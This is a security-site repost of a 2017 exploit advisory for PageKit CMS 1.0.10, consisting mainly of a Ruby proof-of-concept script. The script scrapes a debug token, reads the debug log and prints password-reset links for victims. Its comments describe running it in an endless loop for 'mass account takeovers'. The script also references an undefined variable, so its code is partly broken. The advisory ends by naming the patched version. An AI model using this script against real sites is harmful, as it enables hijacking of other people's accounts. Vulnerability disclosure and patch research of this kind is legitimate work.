首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PageKit 1.0.10 - Password Reset
来源:http​s://securelayer7.net​ 作者:Banawar 发布时间:2017-01-23  
# Exploit Title: Remote PageKit Password Reset Vulnerability
# Date:​21-01-2017
# Software Link: http://pagekit.com/
# Exploit Author: Saurabh Banawar from SecureLayer7​
 
# Contact: http://twitter.com/​securelayer7
# Website: http​s://securelayer7.net​
# Category: webapps
 
1. Description
 
Anyremote user can reset the password by reading the debug log, the exploit
can be successfully executed, if the debug option is enabled in the Pagekit
CMS.
 
CMS Pentest report can be found here:https://securelayer7.net/
download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf
 
 
2. Proof of Concept
 
​require 'net/http'
 
#Enter the domain/IP address of the site for which you want to test this vulnerability
vulnerableSite = 'http://127.0.0.1'
 
loopCount = 0
while loopCount == 0
 
 
#We request the Login page which has the debug parameter
url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login')
request = Net::HTTP::Get.new(url.to_s)
resp = Net::HTTP.start(url.host, url.port) {|http|
http.request(request)
}
 
#The response is received and is sent to many regular expression to find the value of _debug parameter from its HTML source code
bodyOfResponse =  resp.body
myArray1 = bodyOfResponse.split(/"current":"/)
outputOfMyArray1 = myArray1[1]
myArray2 = outputOfMyArray1.split(/"};/)
theSecret = myArray2[0]
puts ""
puts "The secret token to debug link is: #{theSecret}"
puts ""
url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret)
request = Net::HTTP::Get.new(url.to_s)
resp = Net::HTTP.start(url.host, url.port) {|http|
http.request(request)
}
 
resp.body
 
initial = resp.body
 
#The count of number of victim users is found out
 users = initial.scan(/user=.+?(?=")/)
 c =  users.count
 e = c.to_i
 
#If the count is 0 then we continuosly monitor it
 if c == 0 then puts "Currently no user has clicked on reset password like."
 
 puts ""
 puts "Trying again..."
 puts ""
 puts ""
 
#If the count is greater than 0 then it means we found a victim. So, find the password reset link and display it in the console
 else
 
 link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user="
 link2 = "&key="
 i = 0
  while i<e
    securityToken = ''
    a = real[i]
    b = a.split('=')
    c = b[1]
    d = c.split('\\')
    victimUserName = d[0]
    puts "The victim is: #{victimUserName}"
    f = b[2]
    securityToken = f.scan(/[^\\]/)
    securityTokenFiltered = securityToken.join
    puts "The security token of victim is: #{securityTokenFiltered}"
    puts "Link for account takeover"
    puts "#{link1}#{victimUserName}#{link2}#{securityTokenFiltered}"
    puts ""
    puts ""
    i += 1
 end
 
 
 end
 
 # This loop runs forever because we want to continuosly monitor who is requesting a password reset and who has clicked on the link so that
 # we can perform mass account takeovers
 end
 
 
 
3. Solution:
 
Update to version 1.0.11
https://github.com/pagekit/pagekit/releases/tag/1.0.11
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DiskSavvy Enterprise 9.1.14 /
·Python 2.x Buffer Overflow
·SunOS 5.11 Remote ICMP Weaknes
·Microsoft Remote Desktop Clien
·Pirelli DRG A115 v3 ADSL Route
·Oracle OpenJDK Runtime Environ
·Tenda ADSL2/2+ Modem D820R - U
·Firefox nsSMILTimeContainer::N
·SentryHD 02.01.12e - Privilege
·Cisco WebEx - 'nativeMessaging
·BoZoN 2.4 - Remote Code Execut
·Geutebrueck GCore 1.3.8.42/1.4
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved